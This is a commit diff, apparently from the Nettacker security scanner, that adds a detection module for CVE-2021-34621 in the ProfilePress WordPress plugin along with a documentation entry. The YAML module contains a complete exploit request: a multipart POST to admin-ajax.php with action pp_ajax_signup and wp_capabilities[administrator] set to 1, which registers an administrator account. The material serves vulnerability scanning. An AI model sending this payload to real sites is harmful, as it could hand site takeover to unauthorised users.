Created 'wp_plugin_cve_2021_34621_vuln'

docs/Modules.md

@@ -160,6 +160,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**ssl_weak_cipher_vuln**' - check if server's SSL configuration supports weak cipher suites
 * '**wordpress_dos_cve_2018_6389_vuln**' - check if Wordpress is vulnerable to CVE-2018-6389 Denial Of Service (DOS) 
 * '**wp_xmlrpc_bruteforce_vuln**' - check if Wordpress is vulnerable to credential Brute Force via XMLRPC wp.getUsersBlogs
+* '**wp_plugin_cve_2021_34621_vuln**' - check the target for CVE-2021-34621
 * '**wp_xmlrpc_pingback_vuln**' - check if Wordpress is vulnerable to XMLRPC pingback 
 * '**x_powered_by_vuln**' - check if the web server is leaking server configuration in 'X-Powered-By' response header
 * '**xdebug_rce_vuln**' - checks if web server is running XDebug version 2.5.5 vulnerable to RCE

nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml

@@ -0,0 +1,96 @@
+info:
+  name: wp_plugin_cve_2021_34621_vuln
+  author: Manushya-a
+  severity: 9.8
+  description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security.
+  references: 
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-34621
+    - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+    - wordpress
+    - wp
+
+payloads:
+  - library: http
+    steps:
+      - method: post
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          content-Type: multipart/form-data; boundary=----WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Accept: application/json, text/javascript, */*; q=0.01
+          Accept-Encoding: gzip, deflate, br
+          Connection: keep-alive
+          X-Requested-With: XMLHttpRequest
+
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+        data: |
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="reg_username"
+
+          xyzrandom
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="reg_email"
+
+          [email protected]
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="reg_password"
+
+          randomxyz
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="reg_password_present"
+
+          true
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="reg_first_name"
+
+          xyz
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="reg_last_name"
+
+          abc
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="wp_capabilities[administrator]"
+
+          1
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="signup_form_id"
+
+          1
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="action"
+
+          pp_ajax_signup
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+          Content-Disposition: form-data; name="melange_id"
+
+
+          ------WebKitFormBoundary5XkgsgiDB4ZqFfxk--
+
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "500"
+              reverse: false
+            content:
+              regex: "There has been a critical error on this website."
+              reverse: false